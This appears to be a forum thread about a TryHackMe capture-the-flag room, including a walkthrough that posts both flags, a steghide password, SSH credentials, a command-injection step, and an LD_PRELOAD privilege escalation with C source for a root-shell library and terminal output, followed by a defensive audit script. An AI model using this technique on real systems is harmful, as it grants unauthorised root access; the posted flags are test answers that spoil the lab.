U.A. High School Discussion

Let’s discuss U.A. High School.

OMG no attack vector

Directory scanning, subdomain enum, parameter fuzzing, nothing gave a result

The TryHackMe staff are not able to classify challenges :grinning:

A fantasy room based on an anime. It shouldn’t even be on TryHackMe. It’s just designed to waste people’s time. I’ll share the flags and a write-up here to save you time. Please dislike the room to show that you deserve better ones.

User Flag: THM{W3lC0m3_D3kU_1A_0n3f0rAll??}

Root Flag: THM{Y0U_4r3_7h3_NUm83r_1_H3r0}

  1. Execute the command via /assets/index.php?cmd=ls. (wtf!!)
  2. Find the hidden image and fix its magic bytes.
  3. Use steghide to extract the data inside it. Password: AllmightForEver!!!.
  4. Using the following credentials, log in via SSH: deku:One?For?All_!!one1/A.
  5. Get the user flag.

Check sudo -l

deku@myheroacademia:/tmp$ sudo -l
[sudo] password for deku: 
Matching Defaults entries for deku on myheroacademia:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User deku may run the following commands on myheroacademia:
    (ALL) /opt/NewComponent/feedback.sh
deku@myheroacademia:/tmp$ sudo /opt/NewComponent/feedback.sh
Hello, Welcome to the Report Form       
This is a way to report various problems
    Developed by                        
        The Technical Department of U.A.
Enter your feedback:
asd > test.txt

Notice that you can write files as root. We can use this to escalate privileges.

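#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* declares unlink(), setgid(), setuid() */

/* _init() runs as soon as the dynamic loader maps this library. */
void _init() {
    /* Remove the preload entry so later processes start normally. */
    unlink("/etc/ld.so.preload");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
// cd /tmp
// -nostartfiles lets the library define its own _init
// gcc -fPIC -shared -o pe.so pe.c -nostartfiles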
After compiling and transferring the library, copy it to /tmp and execute any binary with the SUID bit. I ran sudo to trigger the loading of the preload library.

deku@myheroacademia:/tmp$ sudo /opt/NewComponent/feedback.sh
Hello, Welcome to the Report Form       
This is a way to report various problems
    Developed by                        
        The Technical Department of U.A.
Enter your feedback:
/tmp/pe.so > /etc/ld.so.preload
Feedback successfully saved.
deku@myheroacademia:/tmp$ /usr/bin/sudo
root@myheroacademia:/tmp# cd /root
root@myheroacademia:/root# ls
root.txt  snap
root@myheroacademia:/root# cat root.txt

For an easier privilege escalation technique, you can also check this write-up.
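A defender's check for the preload list this write-up relies on, added here as an example and not part of any post in the thread: it audits a preload list (by default /etc/ld.so.preload) for entries that are missing, not owned by root, writable by others, or stored in a world-writable directory such as /tmp. The function names and the sample file are assumptions made for the example, and it needs GNU stat.

```shell
#!/bin/sh
# Added example: audit a preload list for entries that an unprivileged user
# could have planted or could swap out. Read-only; needs GNU stat (Linux).

check_lib() {
    lib=$1
    if [ ! -e "$lib" ]; then
        echo "$lib: listed but missing"
        return 0
    fi
    [ "$(stat -c %u "$lib")" = 0 ] || echo "$lib: not owned by root"
    # stat %A prints e.g. -rw-rw-rw-; chars 6 and 9 are group/other write.
    case $(stat -c %A "$lib") in
        ?????w*|????????w*) echo "$lib: writable by group or others" ;;
    esac
    case $(stat -c %A "$(dirname "$lib")") in
        ????????w*) echo "$lib: lives in a world-writable directory" ;;
    esac
    return 0
}

# Prints one finding per line; returns 1 if anything was flagged.
audit_preload() {
    file=${1:-/etc/ld.so.preload}
    [ -f "$file" ] || return 0      # no preload file, nothing is injected
    # glibc splits entries on whitespace or ':' and skips '#' comments.
    out=$(sed 's/#.*//' "$file" | tr ': \t' '\n\n\n' |
        while IFS= read -r lib; do
            [ -z "$lib" ] || check_lib "$lib"
        done)
    [ -n "$out" ] || return 0
    printf '%s\n' "$out"
    return 1
}

# Constructed sample: a list naming a world-writable file, as in the thread.
demo=$(mktemp -d)
: > "$demo/pe.so"; chmod 666 "$demo/pe.so"
printf '# constructed\n%s\n' "$demo/pe.so" > "$demo/preload.list"
audit_preload "$demo/preload.list" || echo "=> review before next exec"
rm -rf "$demo"
```

On most systems /etc/ld.so.preload does not exist at all, so a file-integrity or auditd watch on its creation is a useful complement to this periodic check.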

Why is the /assets path so tricky? Really frustrating!